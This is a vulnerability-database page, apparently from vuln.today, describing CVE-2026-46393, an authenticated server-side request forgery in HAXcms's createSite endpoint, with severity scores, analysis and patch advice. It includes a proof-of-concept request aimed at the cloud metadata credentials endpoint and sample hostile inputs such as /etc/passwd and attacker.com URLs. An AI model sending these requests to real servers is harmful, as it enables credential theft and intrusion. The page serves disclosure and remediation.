Skip to main content

HAXcms CVE-2026-46393

| EUVDEUVD-2026-34884 HIGH
Server-Side Request Forgery (SSRF) (CWE-918)
2026-05-19 https://github.com/haxtheweb/issues GHSA-q862-gcgq-5m6g
7.1
CVSS 4.0 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
7.1 HIGH
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
X

Lifecycle Timeline

6
Analysis Updated
Jun 05, 2026 - 19:34 vuln.today
v3 (cvss_changed)
Analysis Updated
Jun 05, 2026 - 19:34 vuln.today
v2 (cvss_changed)
Re-analysis Queued
Jun 05, 2026 - 19:22 vuln.today
cvss_changed
CVSS changed
Jun 05, 2026 - 19:22 NVD
7.1 (HIGH)
Source Code Evidence Fetched
May 19, 2026 - 15:32 vuln.today
Analysis Generated
May 19, 2026 - 15:32 vuln.today

DescriptionGitHub Advisory

Summary

An authenticated Server-Side Request Forgery (SSRF) vulnerability in HAXcms allows users to fetch arbitrary internal or local resources and write the responses to a web-accessible directory, enabling arbitrary file read and internal network access.

Details

The createSite endpoint in HAXcms (v11.0.6) accepts a build.files parameter that allows an authenticated user to supply arbitrary URLs or local file paths. This input is processed without validation and ultimately fetched server-side using file_get_contents().

The data flow is as follows:

  • User input (build.files) is processed via object_to_array() into a PHP array
  • Assigned to $filesToDownload in Operations.php (line 2626)
  • Iterated over in Operations.php (line 2730), where each entry is passed to HAXCMSFile::save() with bulk-import enabled

In HAXCMSFile.php (line 30), the following occurs:

php
file_get_contents($upload['tmp_name']);

Here, tmp_name is attacker-controlled and may contain:

  • External URLs (http://attacker.com)
  • Internal services (http://127.0.0.1)
  • Cloud metadata endpoints (http://169.254.169.254)
  • Local file paths (/etc/passwd, /proc/self/environ)

The bulk-import flag bypasses is_uploaded_file() validation, which normally ensures the file originates from a legitimate upload. The only restriction is an extension whitelist based on the filename (array key), which is fully attacker-controlled.

There are no restrictions on:

  • URL schemes (http, file, gopher, etc.)
  • Destination IP ranges (internal, loopback, metadata services)
  • Response content

All fetched content is written to:

sites/<sitename>/files/<filename>

and is accessible via the web.

PoC

Prerequisites:

  • Authenticated session (default credentials: admin/admin on fresh installs)
  • Valid JWT and CSRF token

Step 1: Log in and capture JWT + CSRF token

Step 2: Send crafted request:

POST /createSite HTTP/1.1
Host: target
Authorization: Bearer [JWT]
X-CSRF-Token: [TOKEN]
Content-Type: application/json

{
  "site": {
    "name": "poc"
  },
  "build": {
    "files": {
      "poc.txt": {
        "tmp_name": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
      }
    }
  }
}

Step 3: Retrieve response:

GET /sites/poc/files/poc.txt

The response will contain the fetched content (e.g., cloud credentials or internal service data).

Impact

  • SSRF enabling access to internal network services
  • Arbitrary file read via local filesystem paths
  • Cloud credential exposure through metadata endpoints
  • Data exfiltration via web-accessible file storage

Any authenticated user can exploit this to access sensitive server or infrastructure data, potentially leading to full system or cloud environment compromise.

AnalysisAI

Server-Side Request Forgery in HAXcms (versions <= 25.0.0 of @haxtheweb/haxcms-nodejs, with PoC against v11.0.6) allows authenticated low-privileged users to coerce the server into fetching arbitrary URLs or local file paths via the createSite endpoint's build.files parameter, with responses written to a web-accessible directory. This produces arbitrary file read, internal network reconnaissance, and cloud metadata credential theft. Publicly available exploit code exists in the GHSA advisory, though no CISA KEV listing is present.

Technical ContextAI

HAXcms is an open-source headless CMS distributed as the npm package @haxtheweb/haxcms-nodejs, but the vulnerable code path is the PHP backend component. The root cause is CWE-918 (Server-Side Request Forgery): the createSite endpoint deserializes attacker-controlled JSON into $filesToDownload (Operations.php line 2626), iterates the entries (line 2730), and passes each item to HAXCMSFile::save() with a bulk-import flag. In HAXCMSFile.php line 30, the code calls file_get_contents($upload['tmp_name']) where tmp_name is fully attacker-controlled. The bulk-import flag deliberately skips PHP's is_uploaded_file() check, and file_get_contents() in PHP supports multiple URL wrappers (http, https, ftp, file, gopher under some configurations), so the input is treated as a stream URL rather than an actual uploaded temp file. The only validation is an extension whitelist applied to the JSON key (filename), which the attacker also controls.

RemediationAI

Vendor-released patch: upgrade @haxtheweb/haxcms-nodejs to version 26.0.0 or later, per the GHSA-q862-gcgq-5m6g advisory at https://github.com/haxtheweb/issues/security/advisories/GHSA-q862-gcgq-5m6g. Operators who cannot immediately upgrade should rotate or remove default admin/admin credentials and enforce strong authentication on the /createSite endpoint, then restrict outbound network egress from the HAXcms host so it cannot reach internal RFC1918 ranges, loopback, or cloud metadata endpoints (169.254.169.254, fd00:ec2::254) - note this will break any legitimate outbound import workflows. Where feasible, place a reverse proxy or WAF rule in front of /createSite to reject requests whose build.files entries contain scheme prefixes (http://, https://, file://, gopher://, ftp://) or absolute filesystem paths, and consider revoking IMDSv1 in favor of IMDSv2 with hop-limit 1 on cloud instances to neutralize the metadata-exfiltration path.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-46393 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy